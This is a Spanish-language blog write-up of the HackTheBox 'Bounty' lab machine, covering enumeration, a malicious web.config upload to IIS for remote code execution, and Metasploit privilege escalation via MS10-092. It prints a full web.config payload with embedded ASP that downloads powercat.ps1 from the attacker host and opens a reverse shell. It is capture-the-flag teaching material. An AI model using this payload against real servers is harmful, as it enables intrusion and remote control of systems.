· Manuel López Pérez · hackthebox  · 3 min read

WriteUp – Bounty (HackTheBox)

Write-up de Bounty (HackTheBox). Máquina Windows fácil que explota una vulnerabilidad en IIS permitiendo subir un web.config malicioso para ejecutar código ASP y obtener RCE. Luego escalamos privilegios con Metasploit (MS10-092).

Write-up de Bounty (HackTheBox). Máquina Windows fácil que explota una vulnerabilidad en IIS permitiendo subir un web.config malicioso para ejecutar código ASP y obtener RCE. Luego escalamos privilegios con Metasploit (MS10-092).

En este post haremos la máquina Bounty de HackTheBox. Es una maquina windows de un nivel facil pero que nos servirá para aprender algunas cosas interesantes.

Mi nick en HackTheBox es: manulqwerty Si tenéis alguna proposición o corrección no dudéis en dejar un comentario, así aprendemos todos.

Write-Up

Enumeración

Como siempre, lo primero sera un escaneo de puertos con nmap:

nmap -sC -sV 10.10.10.93

Como veis, el único puerto abierto es el 80 que corresponde con un http (Microsoft IIS 7.5)

Vamos a echarle un ojo a la web:

En el index solo vemos un imagen que no nos dice mucho, asi que vamos a fuzzear la web con el fin de encontrar ficheros que permitan vulnerar el sistema.

gobuster -t 125 -u http://10.10.10.93 -x asp,aspx -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Usando gobuster encontramos un ‘transfer.aspx’ que parece que nos puede servir para subir ficheros al otro directorio encontrado: ‘UploadedFiles’

Intentado subir un fichero php vemos que no nos deja y que verifica que la extensión sea adecuada, asi que vamos a usar el intruder de BurpSuite con el fin de averiguar qué extensiones están permitidas:

Como veis se nos permite subir ficheros con la extensión ‘.config’. Además buscamos en Google si existe algun metodo que nos sirva para sacar RCE (Remote Code Execution) en IIS:

Encontramos la web: https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/ que si le echais un ojo vereis que subiendo un web.config podremos ejecutar codigo asp en el servidor.

Explotación

Para explotar dicha vulnerabilidad bastará con subir un web.config como el que vemos en la pagina anterior. Usaremos Powercat para obtener reverse shell:

Os dejo el web.config que nos sirve para obtener reverse shell.

 <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\\system32\\inetsrv\\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration> <!-- <%@ Language=VBScript %> <%

Set objShell = CreateObject("WScript.Shell") Set objScriptExec = objShell.Exec("cmd.exe /c powershell.exe IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.6/powercat.ps1');powercat -c 10.10.14.6 -p 1234 -e cmd")

%> <% Response.write("-"&"->") ' it is running the ASP code if you can see 3 by opening the web.config file! Response.write(1+2) Response.write("<!-"&"-") %> -->

Post-Explotación

Para la Post-Explotación usaremos un modulo de enumeración de Metasploit : ‘post/recon/local_exploit_suggester’ Primero obtenermos meterpreter x64 subiendonos un binario generado con msfvenom o con el modulo ‘exploit/windows/local/payload_inject’ y despues ejecutamos el módulo de post-explotacion:

run post/recon/local_exploit_suggester

Parece que es vulnerable a ms10_092 que podemos explotarlo directamente desde metasploit: ‘exploi/windows/local/ms10_092_schelevator’ Como veis funciona! Y ya podemos leer el flag del Adminsitrador.

Share:
Back to Blog

Related Posts

View All Posts »
WriteUp – Bounty (HackTheBox)

WriteUp – Bounty (HackTheBox)

Bounty write-up (HackTheBox). Easy Windows machine that exploits a vulnerability in IIS, allowing a malicious web.config to be uploaded to execute ASP code and obtain RCE. We then escalate privileges with Metasploit (MS10-092).

WriteUp – Cascade (HackTheBox)

WriteUp – Cascade (HackTheBox)

Cascade write-up (HackTheBox): Windows media machine that exploits LDAP to enumerate users and hidden attributes, obtains VNC credentials from log, reverses .NET binary for AES key, and recovers admin password from deleted objects in Active Directory Recycle Bin.

WriteUp – Cascade (HackTheBox)

WriteUp – Cascade (HackTheBox)

Write-up de Cascade (HackTheBox): máquina Windows media que explota LDAP para enumerar usuarios y atributos ocultos, obtiene credenciales de VNC en registro, revierte binario .NET para clave AES, y recupera contraseña de admin de objetos eliminados en Active Directory Recycle Bin.

HackTheBox Challenges – Web: HDC

HackTheBox Challenges – Web: HDC

First web challenge in the HackTheBox series completed. We learn how to bypass a hardcoded login in JavaScript, discover a secret area with a list of emails, and use Intruder (ZAP or Burp) to find the special address that reveals the flag.